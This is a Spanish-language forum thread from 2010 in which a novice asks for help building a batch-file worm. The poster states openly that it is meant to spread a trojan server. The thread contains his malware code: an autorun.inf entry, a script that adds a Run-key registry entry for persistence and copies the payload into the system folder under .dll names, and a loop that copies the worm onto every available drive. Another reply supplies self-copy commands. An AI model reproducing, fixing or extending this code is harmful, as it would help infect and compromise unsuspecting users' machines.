elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Me ayudais
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Me ayudais  (Leído 4,652 veces)
SockMon

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Me ayudais
« en: 2 Octubre 2010, 21:45 pm »

Hola, soy nuevo, y quiero aprender a crear my propio worms en batch o en visual basic (según me recmendeis) pero prefiero batch ya que es mas facil. He estado buscando pero no encuentro ningun tutorial solo: generadores, algunos ya hechos que se repiten indefinidamente y en cada post dice que lo ha hecho cada uno XD...
No quiero que me lo hagais ustedes (puedes darle un pez a un pobre para que coma por un dia, pero puedes enseñarle a pescar para que no muera de hambre)
Bueno pues si me facilitais un toturial os lo agradezco, mientras tanto seguire buscando  :(
Gracias
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Me ayudais
« Respuesta #1 en: 2 Octubre 2010, 22:01 pm »

Antes de postear utiliza el buscador del foro.

http://foro.elhacker.net/scripting/recopilatorio_de_temas_interesantes_scripting-t132767.0.html
En línea

ApOkAlizE

Desconectado Desconectado

Mensajes: 150


¿sabes lo que vales? ¡consigue lo que te mereces!


Ver Perfil
Re: Me ayudais
« Respuesta #2 en: 3 Octubre 2010, 00:44 am »

Crear un gusano mirando por google lo puedes encontrar pero tendrias que decirnos que tipo de gusanillo quieres crear, o sea si quieres que se disperse por internet o si simplemente quieres que se haga varias copias dentro del mismo ordenador y si el gusano come pan o come semillas..(lo ultimo es broma,xd) el caso es que mira si lo que quieres es que se reproduzca dentro del mismo PC es fácil.
en Batch seria esto:
Copy /y "C:\rutadelgusanillo.bat" "C:\rutadondequieresquesehagalacopiadelgusanillo.bat"
en VB almenos en la versión 6.0 es así:
Filecopy "C:\rutadedondeseencuentraelgusanillo.exe" "C:\rutadedondequieresqueseguardeelgusanillo.exe"
eso si hay algunas versiones de VB como por ejemplo la 2008 creo, que además de Filecopy es Copyfile pero bueno tu prueva de ambas formas y una tiene que funcionar, y recuerda que por VB tambien peudes ejecutar acciones por la shell, es que si haces un gusano en Batch lo malo es que sale la ventana de MS-DOS y eso da el cantazo. si lo que tu quieres es que el gusanillo se reproduzca por internet entonces te aconsejo que lo dejes para más adelante ya que par eso tienes que usar APIs y algo más de conocimientos, pero vamos te aconsejo VB ya que Batch es muy lammer...
En línea

Los virus informaticos son como las personas, hacen lo posible para destruir y hacen lo impossible para no ser destruidos... - ApOkAlizE
SockMon

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Me ayudais
« Respuesta #3 en: 3 Octubre 2010, 01:21 am »

Hola de nuevo, primero digo que lo estoy haciendo en batch ya que la pc que tengo ahora no tiene instalado el BV >:( (tengo en 2008). He empezado a leer un manual y por ahora estoy intentando hacer la propagacion por usb y p2p, veremos como sale.
Quiero especificar que el worms lo estoy haciendo para unirlo con un server del troyano.
Buenas noches ;)
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Me ayudais
« Respuesta #4 en: 3 Octubre 2010, 01:26 am »

:¬¬ si hubiese sabido eso previamente no te hubiese dado la informacion.
En línea

SockMon

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Me ayudais
« Respuesta #5 en: 3 Octubre 2010, 02:22 am »

Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código
  1. [AutoRun]
  2. open=data31.exe
q seria el autorun
-----------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
  7. exit
este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?
En línea

SockMon

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Me ayudais
« Respuesta #6 en: 4 Octubre 2010, 16:33 pm »

Bueno ya lo he terminado o eso creo, pero creo q tengo varios fallos sobre todo a la hora de propagarse en otros pen. haber que os parece o que sugerencias teneis.
-----------------------------------------------------------------------------------------------
Los archivos son:
+autorun.inf
+data31.bat
+data32.exe (virus)
+data34.bat
------------------------------------------------------------------------------------------------
Código
  1. [AutoRun]
  2. open=data31.bat
------------------------------------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.dll"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.dll"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.dll"
  7. copy /y "data34.bat" "%systemroot%\windows\system\data34.dll"
  8. start "data34.bat"
  9. start "data32.exe"
-------------------------------------------------------------------------------------------------
VIRUS
-------------------------------------------------------------------------------------------------
Código
  1. @echo off
  2. :busca
  3. for %%_ in (a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, s, t, u, v, w, x, y, z) do (
  4. dir /b %%_:\ > nul 2>&1 && (
  5. )
  6. )
  7. IF EXIst "%%_:" GOTO copia
  8. Else GOTO espera
  9. :copia
  10. IF EXIST %systemroot%\windows\system\data32.dll GOTO verifica
  11. :verifica
  12. IF EXIT "%%_:\data32.exe" GOTO espera
  13. ELSE GOTO propagar
  14. :propagar
  15. copy /y "%systemroot%\windows\system\data32.dll" "%%_:\data32.exe"
  16. copy /y "%systemroot%\windows\system\autorun.dll" "%%_:\autorun.inf"
  17. copy /y "%systemroot%\windows\system\data31.dll" "%%_:\data31.bat"
  18. copy /y "%systemroot%\windows\system\data34.dll" "%%_:\data34.bat"
  19. :espera
  20. ping -n 100 127.0.0.1 > null
  21. GOTO busca
-------------------------------------------------------------------------------------------------
En línea

Jaixon Jax


Desconectado Desconectado

Mensajes: 859



Ver Perfil
Re: Me ayudais
« Respuesta #7 en: 4 Octubre 2010, 18:44 pm »

Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código
  1. [AutoRun]
  2. open=data31.exe
q seria el autorun
-----------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
  7. exit
este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?

  Con ese auto run solo infectaras pc en africa y algunos lados de suramerica que no usan so actualizaos ni mucho menos av nuevos .....  :D

  %systemroot% si fura tan facil copiarce alli ........ al paso que vas ese worn solo infectara viejas pentiuns 2 en etiopia, somalia y bangladesh y todos esos sitios donde microsoft no tiene oficinas comerciales  :P  :D ......
En línea

SockMon

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Me ayudais
« Respuesta #8 en: 4 Octubre 2010, 19:28 pm »

Hola de nuevo, pero como ya dije es la primera vez que hago esto y no sabia que con eso no iba a llegar a ninguna parte. que solucion le podria dar al autorun  y a %systemroot%?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
me ayudais un momento con el msn? « 1 2 »
Mensajería
scr21 16 8,605 Último mensaje 18 Agosto 2011, 14:05 pm
por Triper0
Buenas,me ayudais con un Windows Vista??
Bugs y Exploits
ps3ps3ps3 2 3,482 Último mensaje 3 Abril 2012, 22:26 pm
por ps3ps3ps3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines